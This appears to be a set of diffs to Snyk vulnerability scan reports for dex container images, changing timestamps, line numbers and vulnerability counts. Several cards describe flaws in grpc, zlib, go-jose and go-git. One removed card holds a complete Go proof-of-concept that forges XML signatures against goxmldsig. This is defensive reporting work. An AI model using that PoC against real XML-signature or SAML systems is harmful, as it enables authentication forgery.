@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:36:21 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:30:29 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>
@@ -881,7 +881,7 @@
</li>
<li class="card__meta__item">
Line number: 32111
Line number: 32104
</li>
</ul>
@@ -933,7 +933,7 @@
</li>
<li class="card__meta__item">
Line number: 32466
Line number: 32459
</li>
</ul>
@@ -1049,7 +1049,7 @@
</li>
<li class="card__meta__item">
Line number: 31901
Line number: 31900
</li>
</ul>
@@ -1165,7 +1165,7 @@
</li>
<li class="card__meta__item">
Line number: 31963
Line number: 31962
</li>
</ul>
@@ -1223,7 +1223,7 @@
</li>
<li class="card__meta__item">
Line number: 32082
Line number: 32075
</li>
</ul>
@@ -1281,7 +1281,7 @@
</li>
<li class="card__meta__item">
Line number: 32106
Line number: 32099
</li>
</ul>
@@ -1339,7 +1339,7 @@
</li>
<li class="card__meta__item">
Line number: 32466
Line number: 32459
</li>
</ul>
@@ -1397,7 +1397,7 @@
</li>
<li class="card__meta__item">
Line number: 32165
Line number: 32158
</li>
</ul>
@@ -1455,7 +1455,7 @@
</li>
<li class="card__meta__item">
Line number: 32561
Line number: 32554
</li>
</ul>
@@ -1513,7 +1513,7 @@
</li>
<li class="card__meta__item">
Line number: 33025
Line number: 33012
</li>
</ul>
@@ -1721,7 +1721,7 @@
</li>
<li class="card__meta__item">
Line number: 32082
Line number: 32075
</li>
</ul>
@@ -1895,7 +1895,7 @@
</li>
<li class="card__meta__item">
Line number: 31901
Line number: 31900
</li>
</ul>
@@ -1953,7 +1953,7 @@
</li>
<li class="card__meta__item">
Line number: 31963
Line number: 31962
</li>
</ul>
@@ -2011,7 +2011,7 @@
</li>
<li class="card__meta__item">
Line number: 32082
Line number: 32075
</li>
</ul>
@@ -2069,7 +2069,7 @@
</li>
<li class="card__meta__item">
Line number: 32106
Line number: 32099
</li>
</ul>
@@ -2127,7 +2127,7 @@
</li>
<li class="card__meta__item">
Line number: 32466
Line number: 32459
</li>
</ul>
@@ -2185,7 +2185,7 @@
</li>
<li class="card__meta__item">
Line number: 32165
Line number: 32158
</li>
</ul>
@@ -2243,7 +2243,7 @@
</li>
<li class="card__meta__item">
Line number: 32561
Line number: 32554
</li>
</ul>
@@ -2301,7 +2301,7 @@
</li>
<li class="card__meta__item">
Line number: 33025
Line number: 33012
</li>
</ul>
@@ -2413,7 +2413,7 @@
</li>
<li class="card__meta__item">
Line number: 31909
Line number: 31908
</li>
</ul>
@@ -2469,7 +2469,7 @@
</li>
<li class="card__meta__item">
Line number: 31890
Line number: 31883
</li>
</ul>
@@ -2525,7 +2525,7 @@
</li>
<li class="card__meta__item">
Line number: 32014
Line number: 32007
</li>
</ul>
@@ -2581,7 +2581,7 @@
</li>
<li class="card__meta__item">
Line number: 32099
Line number: 32092
</li>
</ul>
@@ -2637,7 +2637,7 @@
</li>
<li class="card__meta__item">
Line number: 32113
Line number: 32106
</li>
</ul>
@@ -2693,7 +2693,7 @@
</li>
<li class="card__meta__item">
Line number: 32474
Line number: 32467
</li>
</ul>
@@ -2749,7 +2749,7 @@
</li>
<li class="card__meta__item">
Line number: 32439
Line number: 32432
</li>
</ul>
@@ -2805,7 +2805,7 @@
</li>
<li class="card__meta__item">
Line number: 32924
Line number: 32911
</li>
</ul>
@@ -2861,7 +2861,7 @@
</li>
<li class="card__meta__item">
Line number: 33348
Line number: 33335
</li>
</ul>


@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:36:31 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:30:39 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>
@@ -835,7 +835,7 @@
</li>
<li class="card__meta__item">
Line number: 1358
Line number: 1351
</li>
</ul>
@@ -887,7 +887,7 @@
</li>
<li class="card__meta__item">
Line number: 1713
Line number: 1706
</li>
</ul>
@@ -1003,7 +1003,7 @@
</li>
<li class="card__meta__item">
Line number: 1148
Line number: 1147
</li>
</ul>
@@ -1119,7 +1119,7 @@
</li>
<li class="card__meta__item">
Line number: 1210
Line number: 1209
</li>
</ul>
@@ -1177,7 +1177,7 @@
</li>
<li class="card__meta__item">
Line number: 1329
Line number: 1322
</li>
</ul>
@@ -1235,7 +1235,7 @@
</li>
<li class="card__meta__item">
Line number: 1353
Line number: 1346
</li>
</ul>
@@ -1293,7 +1293,7 @@
</li>
<li class="card__meta__item">
Line number: 1713
Line number: 1706
</li>
</ul>
@@ -1351,7 +1351,7 @@
</li>
<li class="card__meta__item">
Line number: 1412
Line number: 1405
</li>
</ul>
@@ -1409,7 +1409,7 @@
</li>
<li class="card__meta__item">
Line number: 1808
Line number: 1801
</li>
</ul>
@@ -1467,7 +1467,7 @@
</li>
<li class="card__meta__item">
Line number: 2272
Line number: 2259
</li>
</ul>
@@ -1675,7 +1675,7 @@
</li>
<li class="card__meta__item">
Line number: 1329
Line number: 1322
</li>
</ul>
@@ -1849,7 +1849,7 @@
</li>
<li class="card__meta__item">
Line number: 1148
Line number: 1147
</li>
</ul>
@@ -1907,7 +1907,7 @@
</li>
<li class="card__meta__item">
Line number: 1210
Line number: 1209
</li>
</ul>
@@ -1965,7 +1965,7 @@
</li>
<li class="card__meta__item">
Line number: 1329
Line number: 1322
</li>
</ul>
@@ -2023,7 +2023,7 @@
</li>
<li class="card__meta__item">
Line number: 1353
Line number: 1346
</li>
</ul>
@@ -2081,7 +2081,7 @@
</li>
<li class="card__meta__item">
Line number: 1713
Line number: 1706
</li>
</ul>
@@ -2139,7 +2139,7 @@
</li>
<li class="card__meta__item">
Line number: 1412
Line number: 1405
</li>
</ul>
@@ -2197,7 +2197,7 @@
</li>
<li class="card__meta__item">
Line number: 1808
Line number: 1801
</li>
</ul>
@@ -2255,7 +2255,7 @@
</li>
<li class="card__meta__item">
Line number: 2272
Line number: 2259
</li>
</ul>
@@ -2367,7 +2367,7 @@
</li>
<li class="card__meta__item">
Line number: 1156
Line number: 1155
</li>
</ul>
@@ -2423,7 +2423,7 @@
</li>
<li class="card__meta__item">
Line number: 1137
Line number: 1130
</li>
</ul>
@@ -2479,7 +2479,7 @@
</li>
<li class="card__meta__item">
Line number: 1261
Line number: 1254
</li>
</ul>
@@ -2535,7 +2535,7 @@
</li>
<li class="card__meta__item">
Line number: 1346
Line number: 1339
</li>
</ul>
@@ -2591,7 +2591,7 @@
</li>
<li class="card__meta__item">
Line number: 1360
Line number: 1353
</li>
</ul>
@@ -2647,7 +2647,7 @@
</li>
<li class="card__meta__item">
Line number: 1721
Line number: 1714
</li>
</ul>
@@ -2703,7 +2703,7 @@
</li>
<li class="card__meta__item">
Line number: 1686
Line number: 1679
</li>
</ul>
@@ -2759,7 +2759,7 @@
</li>
<li class="card__meta__item">
Line number: 2171
Line number: 2158
</li>
</ul>
@@ -2815,7 +2815,7 @@
</li>
<li class="card__meta__item">
Line number: 2595
Line number: 2582
</li>
</ul>

File diff suppressed because it is too large


@@ -7,7 +7,7 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Snyk test report</title>
<meta name="description" content="31 known vulnerabilities found in 50 vulnerable dependency paths.">
<meta name="description" content="27 known vulnerabilities found in 46 vulnerable dependency paths.">
<base target="_blank">
<link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
sizes="194x194">
@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:34:09 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:28:16 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following paths:</span>
@@ -505,9 +505,9 @@
</div>
<div class="meta-counts">
<div class="meta-count"><span>31</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>50 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1192</span> <span>dependencies</span></div>
<div class="meta-count"><span>27</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>46 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1189</span> <span>dependencies</span></div>
</div><!-- .meta-counts -->
</div><!-- .layout-container--short -->
</header><!-- .project__header -->
@@ -516,7 +516,7 @@
<div class="layout-container" style="padding-top: 35px;">
<div class="cards--vuln filter--patch filter--ignore">
<div class="card card--vuln disclosure--not-new severity--critical" data-snyk-test="critical">
<h2 class="card__title">Incorrect Authorization</h2>
<h2 class="card__title">Out-of-bounds Write</h2>
<div class="card__section">
<div class="card__labels">
@@ -532,20 +532,17 @@
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
Package Manager: alpine:3.23
</li>
<li class="card__meta__item">
Vulnerable module:
google.golang.org/grpc
zlib/zlib
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v5@* and google.golang.org/grpc@v1.77.0
docker-image|ghcr.io/dexidp/dex@v2.45.0 and zlib/zlib@1.3.1-r2
</li>
</ul>
@@ -558,18 +555,33 @@
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v5@*
docker-image|ghcr.io/dexidp/dex@v2.45.0
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.77.0
zlib/zlib@1.3.1-r2
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
docker-image|ghcr.io/dexidp/dex@v2.45.0
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.79.1
apk-tools/apk-tools@3.0.3-r1
<span class="list-paths__item__arrow"></span>
zlib/zlib@1.3.1-r2
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
docker-image|ghcr.io/dexidp/dex@v2.45.0
<span class="list-paths__item__arrow"></span>
apk-tools/apk-tools@3.0.3-r1
<span class="list-paths__item__arrow"></span>
apk-tools/libapk@3.0.3-r1
<span class="list-paths__item__arrow"></span>
zlib/zlib@1.3.1-r2
</span>
@@ -580,21 +592,25 @@
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
<h2 id="nvd-description">NVD Description</h2>
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>zlib</code> package and not the <code>zlib</code> package as distributed by <code>Alpine</code>.</em>
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
<p>zlib versions up to and including 1.3.1.2 include a global buffer overflow in the untgz utility located under contrib/untgz. The vulnerability is limited to the standalone demonstration utility and does not affect the core zlib compression library. The flaw occurs when a user executes the untgz command with an excessively long archive name supplied via the command line, leading to an out-of-bounds write in a fixed-size global buffer.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
<p>Upgrade <code>Alpine:3.23</code> <code>zlib</code> to version 1.3.2-r0 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
<li><a href="https://github.com/madler/zlib">https://github.com/madler/zlib</a></li>
<li><a href="https://seclists.org/fulldisclosure/2026/Jan/3">https://seclists.org/fulldisclosure/2026/Jan/3</a></li>
<li><a href="https://www.vulncheck.com/advisories/zlib-untgz-global-buffer-overflow-in-tgzfname">https://www.vulncheck.com/advisories/zlib-untgz-global-buffer-overflow-in-tgzfname</a></li>
<li><a href="https://zlib.net/">https://zlib.net/</a></li>
<li><a href="https://github.com/madler/zlib/issues/1142">https://github.com/madler/zlib/issues/1142</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-ZLIB-15435528">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
@@ -670,279 +686,6 @@
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15182758">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Improper Verification of Cryptographic Signature</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Proof of Concept</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.45.0/dexidp/dex <span class="list-paths__item__arrow"></span> /usr/local/bin/dex
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/russellhaering/goxmldsig
</li>
<li class="card__meta__item">Introduced through:
github.com/dexidp/dex@* and github.com/russellhaering/goxmldsig@v1.5.0
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/russellhaering/goxmldsig@v1.5.0
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p><a href="https://github.com/russellhaering/goxmldsig">github.com/russellhaering/goxmldsig</a> is a XML Digital Signatures implemented in pure Go.</p>
<p>Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the <code>validateSignature</code> function in the <code>validate.go</code> file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element&#39;s contents with another referenced element&#39;s.</p>
<h2 id="poc">PoC</h2>
<pre><code>package main
import (
&quot;crypto/rand&quot;
&quot;crypto/rsa&quot;
&quot;crypto/tls&quot;
&quot;crypto/x509&quot;
&quot;encoding/base64&quot;
&quot;fmt&quot;
&quot;math/big&quot;
&quot;time&quot;
&quot;github.com/beevik/etree&quot;
dsig &quot;github.com/russellhaering/goxmldsig&quot;
)
func main() {
key, err := rsa.GenerateKey(rand.Reader, 2048)
if err != nil {
panic(err)
}
template := &amp;x509.Certificate{
SerialNumber: big.NewInt(1),
NotBefore: time.Now().Add(-1 * time.Hour),
NotAfter: time.Now().Add(1 * time.Hour),
}
certDER, err := x509.CreateCertificate(rand.Reader, template, template, &amp;key.PublicKey, key)
if err != nil {
panic(err)
}
cert, _ := x509.ParseCertificate(certDER)
doc := etree.NewDocument()
root := doc.CreateElement(&quot;Root&quot;)
root.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
root.SetText(&quot;Malicious Content&quot;)
tlsCert := tls.Certificate{
Certificate: [][]byte{cert.Raw},
PrivateKey: key,
}
ks := dsig.TLSCertKeyStore(tlsCert)
signingCtx := dsig.NewDefaultSigningContext(ks)
sig, err := signingCtx.ConstructSignature(root, true)
if err != nil {
panic(err)
}
signedInfo := sig.FindElement(&quot;./SignedInfo&quot;)
existingRef := signedInfo.FindElement(&quot;./Reference&quot;)
existingRef.CreateAttr(&quot;URI&quot;, &quot;#dummy&quot;)
originalEl := etree.NewElement(&quot;Root&quot;)
originalEl.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
originalEl.SetText(&quot;Original Content&quot;)
sig1, _ := signingCtx.ConstructSignature(originalEl, true)
ref1 := sig1.FindElement(&quot;./SignedInfo/Reference&quot;).Copy()
signedInfo.InsertChildAt(existingRef.Index(), ref1)
c14n := signingCtx.Canonicalizer
detachedSI := signedInfo.Copy()
if detachedSI.SelectAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix) == nil {
detachedSI.CreateAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix, dsig.Namespace)
}
canonicalBytes, err := c14n.Canonicalize(detachedSI)
if err != nil {
fmt.Println(&quot;c14n error:&quot;, err)
return
}
hash := signingCtx.Hash.New()
hash.Write(canonicalBytes)
digest := hash.Sum(nil)
rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
if err != nil {
panic(err)
}
sigVal := sig.FindElement(&quot;./SignatureValue&quot;)
sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
certStore := &amp;dsig.MemoryX509CertificateStore{
Roots: []*x509.Certificate{cert},
}
valCtx := dsig.NewDefaultValidationContext(certStore)
root.AddChild(sig)
doc.SetRoot(root)
str, _ := doc.WriteToString()
fmt.Println(&quot;XML:&quot;)
fmt.Println(str)
validated, err := valCtx.Validate(root)
if err != nil {
fmt.Println(&quot;validation failed:&quot;, err)
} else {
fmt.Println(&quot;validation ok&quot;)
fmt.Println(&quot;validated text:&quot;, validated.Text())
}
}
</code></pre>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/russellhaering/goxmldsig</code> to version 1.6.0 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/russellhaering/goxmldsig/commit/db3d1e31f7535d7f5debb49851b9e9a2ff08b936">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-15692488">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Uncaught Exception</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/go-jose/go-jose/v4
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v5@* and github.com/go-jose/go-jose/v4@v4.1.3
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v5@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.1.3
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.1.3
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Uncaught Exception in the <code>cipher.KeyUnwrap</code> function when decrypting a JSON Web Encryption (JWE) object with a key wrapping algorithm (ending in &#39;KW&#39;, except for &#39;A128GCMKW&#39;, &#39;A192GCMKW&#39;, and &#39;A256GCMKW&#39;) and the <code>encrypted_key</code> field is empty. An attacker can cause a panic and disrupt service by submitting a crafted JWE object with an empty <code>encrypted_key</code> field or by directly invoking <code>cipher.KeyUnwrap</code> with a ciphertext parameter less than 16 bytes long.</p>
<p><strong>Note:</strong></p>
<p>This is only exploitable if the list of accepted key algorithms includes key wrapping algorithms.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by prevalidating JWE objects to ensure the <code>encrypted_key</code> field is nonempty, or by excluding key wrapping algorithms from the list of accepted key algorithms.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/go-jose/go-jose/v4</code> to version 4.1.4 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8">GitHub Advisory</a></li>
<li><a href="https://github.com/go-jose/go-jose/commit/0e59876635f3dbf46d7b5e97b52bb75a3f96e7d9">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOJOSEGOJOSEV4-15875221">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
<h2 class="card__title">Improper Validation of Specified Quantity in Input</h2>
@@ -1030,9 +773,9 @@
<h2 id="references">References</h2>
<ul>
<li><a href="https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/">https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/</a></li>
<li><a href="https://github.com/madler/zlib/issues/904">https://github.com/madler/zlib/issues/904</a></li>
<li><a href="https://github.com/madler/zlib/releases/tag/v1.3.2">https://github.com/madler/zlib/releases/tag/v1.3.2</a></li>
<li><a href="https://ostif.org/zlib-audit-complete/">https://ostif.org/zlib-audit-complete/</a></li>
<li><a href="https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf">https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf</a></li>
</ul>
@@ -2692,153 +2435,6 @@
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
<h2 class="card__title">Allocation of Resources Without Limits or Throttling</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--medium">
<span class="label__text">medium severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/go-git/go-git/v5/plumbing/format/index
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v5@* and github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v5@*
<span class="list-paths__item__arrow"></span>
github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the handling of <code>.idx</code> files. An attacker with write access to the local repository&#39;s <code>.git</code> directory can exhaust system memory by placing a maliciously crafted <code>.idx</code> file there.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/go-git/go-git/v5/plumbing/format/index</code> to version 5.17.1 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/go-git/go-git/security/advisories/GHSA-jhf3-xxhw-2wpp">GitHub Advisory</a></li>
<li><a href="https://github.com/go-git/go-git/commit/3ec0d70cb687ae1da5f4d18faa4229bd971a8710">GitHub Commit</a></li>
<li><a href="https://github.com/go-git/go-git/commit/6b38a326816b80f64c20cc0e6113958b65c05a1c">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOGITGOGITV5PLUMBINGFORMATINDEX-15855220">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
<h2 class="card__title">Improper Validation of Array Index</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--medium">
<span class="label__text">medium severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/go-git/go-git/v5/plumbing/format/index
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v5@* and github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v5@*
<span class="list-paths__item__arrow"></span>
github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Improper Validation of Array Index through improper validation in the index decoding for version 4 files. An attacker with write access to the <code>.git</code> directory can cause a panic and terminate the process by modifying or injecting a maliciously crafted <code>.git/index</code> file that triggers an out-of-bounds slice operation during index parsing.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/go-git/go-git/v5/plumbing/format/index</code> to version 5.17.1 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/go-git/go-git/security/advisories/GHSA-gm2x-2g9h-ccm8">GitHub Advisory</a></li>
<li><a href="https://github.com/go-git/go-git/commit/e9b65df44cb97faeba148b47523a362beaecddf9">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOGITGOGITV5PLUMBINGFORMATINDEX-15855246">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
</div><!-- cards -->
</div>
</main><!-- .layout-stacked__content -->


@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:34:14 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:28:23 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>


@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:34:20 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:28:29 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

File diff suppressed because it is too large


@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:47:53 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:38:20 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>


@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:48:02 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:38:29 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

File diff suppressed because it is too large


@@ -7,7 +7,7 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Snyk test report</title>
<meta name="description" content="49 known vulnerabilities found in 146 vulnerable dependency paths.">
<meta name="description" content="46 known vulnerabilities found in 141 vulnerable dependency paths.">
<base target="_blank">
<link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
sizes="194x194">
@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:45:57 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:36:29 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following paths:</span>
@@ -505,9 +505,9 @@
</div>
<div class="meta-counts">
<div class="meta-count"><span>49</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>146 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1134</span> <span>dependencies</span></div>
<div class="meta-count"><span>46</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>141 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1131</span> <span>dependencies</span></div>
</div><!-- .meta-counts -->
</div><!-- .layout-container--short -->
</header><!-- .project__header -->
@@ -515,89 +515,6 @@
<div class="layout-container" style="padding-top: 35px;">
<div class="cards--vuln filter--patch filter--ignore">
<div class="card card--vuln disclosure--not-new severity--critical" data-snyk-test="critical">
<h2 class="card__title">Incorrect Authorization</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--critical">
<span class="label__text">critical severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/hairyhenderson/gomplate/v4 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
